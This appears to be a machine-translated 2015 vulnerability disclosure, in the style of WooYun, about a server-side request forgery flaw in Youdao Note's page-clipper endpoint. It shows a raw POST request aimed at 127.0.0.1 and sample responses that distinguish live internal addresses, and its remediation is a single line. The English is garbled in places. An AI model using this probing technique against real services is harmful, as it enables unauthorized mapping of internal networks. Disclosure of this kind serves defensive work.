Netease SSRF can detect the Intranet

Netease SSRF can detect the Intranet

Vulnerability URL: http://note.youdao.com/memory? Url = http://www.wooyun.org (register for login if you need)

Where the body is previewed

<meta name="description" content=""/>

Content as a display



Track the jump of a webpage
 

POST /yws/open/memory?method=content HTTP/1.1Host: note.youdao.comProxy-Connection: keep-aliveContent-Length: 20Accept: application/json, text/javascript, */*Origin: http://note.youdao.comX-Requested-With: XMLHttpRequestCookie: url=http://127.0.0.1

(The parameters have been reduced. Please capture packets by yourself)





The unattainable result based on the URL address is similar to the following:

Arrival:
 

HTTP/1.1 200 OKServer: TengineDate: Wed, 14 Jan 2015 15:38:44 GMTContent-Type: text/json; charset=UTF-8Content-Length: 41Connection: closePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: Thu, 01 Jan 1970 00:00:00 GMTContent-Language: zh-CNCache-Control: no-cache{"content":"","title":null,"type":"NONE"}

(For example, content is displayed on the content Intranet. If no content exists and no address exists, you can test www.wooyun.org -- with content www.baidu.com -- without content)



If not:
 

HTTP/1.1 500 Internal Server ErrorServer: TengineDate: Thu, 15 Jan 2015 00:57:34 GMTContent-Type: text/json; charset=UTF-8Content-Length: 157Connection: closeRES-CODE: 213Pragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: Thu, 01 Jan 1970 00:00:00 GMTContent-Language: zh-CN{"message":"Message[DATA_TRANSMISSION_FAILURE]: Page Clipper Exception, URL=http://127.0.0.1","canTryAgain":false,"scope":"PREVIOUS_EXCEPTION","error":"213"}

 

 

 

 

Solution:

Filtering and Restriction